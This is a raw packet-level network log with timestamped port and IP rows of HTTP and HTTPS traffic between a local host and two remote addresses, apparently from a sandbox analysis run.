Aug 10, 2024 16:12:24.219871044 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219886065 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219908953 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.219911098 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219924927 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219938993 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219954014 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219958067 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.219958067 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.219974041 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.219979048 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219994068 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220006943 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220021963 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220036983 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220051050 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220066071 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220087051 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.220087051 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.220087051 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.220087051 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.220130920 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220158100 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220165014 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.220176935 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220201015 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220213890 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220231056 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220237017 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.220237017 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.220237017 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.220247030 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220300913 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.220300913 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.220300913 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.220304966 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220316887 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220330000 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220355988 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220369101 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220370054 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.220382929 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220382929 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.220397949 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220407009 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.220412016 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220422983 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.220426083 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220441103 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220453024 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.220454931 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220470905 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220499039 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220523119 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220524073 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.220526934 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.220526934 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.220536947 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.220536947 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220551968 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220566988 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220580101 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220585108 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.220594883 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220602989 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.220609903 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220624924 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220628977 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.220628977 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.220643044 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.220644951 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220659971 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220670938 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.220674992 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220690966 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220704079 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220719099 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220721960 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.220724106 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.220731974 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220746994 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220750093 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.220769882 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.220777988 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220796108 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.220803976 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220807076 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.220819950 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220835924 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220845938 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.220853090 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220860004 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.220868111 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220875978 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.220884085 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220899105 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220912933 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220927954 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220930099 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.220930099 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.220930099 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.220942974 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220957994 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220972061 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.220988035 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221014977 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221024990 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221026897 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221026897 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221026897 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221026897 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221029043 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221044064 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221059084 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221084118 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221097946 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221112967 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221117973 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221117973 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221117973 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221117973 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221127987 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221143961 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221159935 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221175909 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221184015 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221184015 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221184015 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221184015 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221189976 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221221924 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221221924 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221221924 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221241951 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221256018 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221270084 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221285105 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221287966 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221298933 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221313000 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221318960 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221322060 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221328020 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221333981 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221352100 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221366882 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221380949 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221395969 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221410990 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221415997 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221425056 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221431017 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221431017 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221441031 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221442938 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221463919 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221483946 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221504927 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221520901 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221534967 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221549988 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221555948 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221565008 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221579075 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221580982 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221592903 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221595049 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221600056 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221612930 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221620083 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221626997 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221632957 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221642017 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221662998 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221667051 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221677065 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221693039 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221702099 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221716881 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221719980 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221729040 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221746922 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221756935 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221765041 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221771955 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221790075 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221791983 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221806049 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221816063 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221827984 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221837044 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221844912 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221852064 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221863985 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221867085 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221882105 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221895933 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221901894 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221919060 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221919060 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221935034 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221947908 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221951962 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221963882 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221971035 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221972942 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.221978903 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.221992970 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222007990 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222017050 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.222017050 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.222034931 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222047091 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222062111 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222068071 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.222068071 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.222075939 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222088099 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.222091913 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222117901 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.222124100 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222138882 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222145081 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.222153902 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222162008 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.222170115 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222174883 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.222183943 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222193003 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.222201109 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222206116 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.222217083 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222230911 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222234964 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.222246885 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222255945 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.222263098 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222276926 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222292900 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222307920 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222317934 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.222317934 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.222317934 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.222317934 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.222321987 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222337008 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222340107 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.222358942 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.222361088 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222383976 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.222384930 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222388983 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.222400904 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.222403049 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222429037 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222429991 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.222444057 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222451925 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.222459078 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222476006 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222490072 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222528934 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222543955 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222551107 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.222551107 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.222559929 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222568035 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.222575903 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222592115 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222600937 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.222606897 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222621918 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222623110 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.222623110 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.222636938 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222656965 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222671986 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222682953 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.222682953 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.222687960 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222702026 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222717047 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222722054 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.222722054 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.222734928 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.222745895 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.222891092 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.222891092 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.223293066 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.223308086 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.223324060 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.223345041 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.223361969 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.223387003 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.223387003 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.223387003 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.223387003 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.223474026 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.223509073 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.223526001 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.223673105 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.258341074 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.258394957 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.258457899 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.258457899 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.258465052 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.258996010 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.263290882 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.263324976 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.263390064 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.263442039 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.263442993 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.263474941 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.263508081 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.263545036 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.263557911 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.266915083 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.299393892 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.299407005 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.299595118 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.299599886 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.299648046 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.299679995 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.299746990 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.299752951 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.300009012 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.300038099 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.300086975 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.300092936 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.300123930 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.300153017 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.300153017 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.300158978 CEST	443	49754	162.159.130.233	192.168.2.4
